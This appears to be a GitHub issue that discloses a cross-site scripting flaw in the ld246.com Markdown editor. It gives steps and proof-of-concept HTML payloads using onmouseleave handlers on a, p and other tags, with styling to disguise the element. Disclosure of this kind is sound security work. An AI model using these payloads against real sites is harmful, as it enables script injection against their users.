You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
1.Open the https://ld246.com/guide/markdown
2.Enter the XSS PoC
3.When the user hovers the mouse away from the picture, XSS is triggered via a mouse event.
some other tags are also be affected such as p, a, svg, etc.
<input autofocus>
<a src=1 onmouseleave=alert('XSS')>This is a XSS link</a>
<input autofocus>
<p src=1 onmouseleave=alert('XSS')>This is a XSS textarea</p>
...
It also can add any styles to disguise such as size, color, etc.
<input autofocus>
<p src=1 onmouseleave=alert('XSS') style="font-size: 200%;color: green;">here are a large textarea</p>
The text was updated successfully, but these errors were encountered:
PoC :
Steps:
1.Open the https://ld246.com/guide/markdown
2.Enter the XSS PoC
3.When the user hovers the mouse away from the picture, XSS is triggered via a mouse event.
some other tags are also be affected such as p, a, svg, etc.
It also can add any styles to disguise such as size, color, etc.
The text was updated successfully, but these errors were encountered: